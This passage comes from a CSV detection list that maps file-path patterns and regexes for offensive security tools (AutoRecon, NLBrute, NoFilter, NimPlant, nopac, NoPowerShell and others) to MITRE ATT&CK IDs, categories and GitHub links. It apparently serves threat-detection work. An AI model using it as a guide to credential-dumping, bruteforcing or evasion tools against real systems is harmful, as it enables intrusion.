T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\nightCrawler.ps1*",".{0,1000}\\nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*\nikto.py*",".{0,1000}\\nikto\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\NimBlackout*",".{0,1000}\\NimBlackout.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*\NimDllSideload\*",".{0,1000}\\NimDllSideload\\.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*\Nimperiments-main*",".{0,1000}\\Nimperiments\-main.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*\NimPlant.*",".{0,1000}\\NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*\nimproxydll\*",".{0,1000}\\nimproxydll\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*\nimproxydll-main\*",".{0,1000}\\nimproxydll\-main\\.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*\Ninja.py*",".{0,1000}\\Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*\NLBrute*.rar*",".{0,1000}\\NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*\NLBrute*.zip*",".{0,1000}\\NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*\NLBrute.exe*",".{0,1000}\\NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*\nmap-ajp.py*",".{0,1000}\\nmap\-ajp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-cassandra.py*",".{0,1000}\\nmap\-cassandra\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-cups.py*",".{0,1000}\\nmap\-cups\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-distccd.py*",".{0,1000}\\nmap\-distccd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-dns.py*",".{0,1000}\\nmap\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-finger.py*",".{0,1000}\\nmap\-finger\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ftp.py*",".{0,1000}\\nmap\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-http.py*",".{0,1000}\\nmap\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-imap.py*",".{0,1000}\\nmap\-imap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-irc.py*",".{0,1000}\\nmap\-irc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-kerberos.py*",".{0,1000}\\nmap\-kerberos\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ldap.py*",".{0,1000}\\nmap\-ldap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mongodb.py*",".{0,1000}\\nmap\-mongodb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mountd.py*",".{0,1000}\\nmap\-mountd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-msrpc.py*",".{0,1000}\\nmap\-msrpc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mssql.py*",".{0,1000}\\nmap\-mssql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-multicast-dns.py*",".{0,1000}\\nmap\-multicast\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-mysql.py*",".{0,1000}\\nmap\-mysql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-nfs.py*",".{0,1000}\\nmap\-nfs\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-nntp.py*",".{0,1000}\\nmap\-nntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ntp.py*",".{0,1000}\\nmap\-ntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-oracle.py*",".{0,1000}\\nmap\-oracle\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-pop3.py*",".{0,1000}\\nmap\-pop3\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-rdp.py*",".{0,1000}\\nmap\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-redis.py*",".{0,1000}\\nmap\-redis\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-rmi.py*",".{0,1000}\\nmap\-rmi\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-rsync.py*",".{0,1000}\\nmap\-rsync\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-sip.py*",".{0,1000}\\nmap\-sip\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-smb.py*",".{0,1000}\\nmap\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-smtp.py*",".{0,1000}\\nmap\-smtp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-snmp.py*",".{0,1000}\\nmap\-snmp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ssh.py*",".{0,1000}\\nmap\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-telnet.py*",".{0,1000}\\nmap\-telnet\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-tftp.py*",".{0,1000}\\nmap\-tftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-vnc.py*",".{0,1000}\\nmap\-vnc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nMethodNamespace=StandIn*",".{0,1000}\\nMethodNamespace\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*\NoAmsi.ps1*",".{0,1000}\\NoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\NoArgs.cpp*",".{0,1000}\\NoArgs\.cpp.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs.exe*",".{0,1000}\\NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs.exe.config*",".{0,1000}\\NoArgs\.exe\.config.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs.exe.log*",".{0,1000}\\NoArgs\.exe\.log.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs_Encrypted.exe*",".{0,1000}\\NoArgs_Encrypted\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\No-Consolation\source\*",".{0,1000}\\No\-Consolation\\source\\.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*\Nofault.exe*",".{0,1000}\\Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*\NoFilter.cpp*",".{0,1000}\\NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.exe*",".{0,1000}\\NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.sln*",".{0,1000}\\NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.vcxproj*",".{0,1000}\\NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\nopac.exe*",".{0,1000}\\nopac\.exe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*\nopac.py*",".{0,1000}\\nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NoPowerShell*",".{0,1000}\\NoPowerShell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\NoPowerShell.*",".{0,1000}\\NoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\No-PowerShell.cs*",".{0,1000}\\No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\No-PowerShell.exe*",".{0,1000}\\No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense 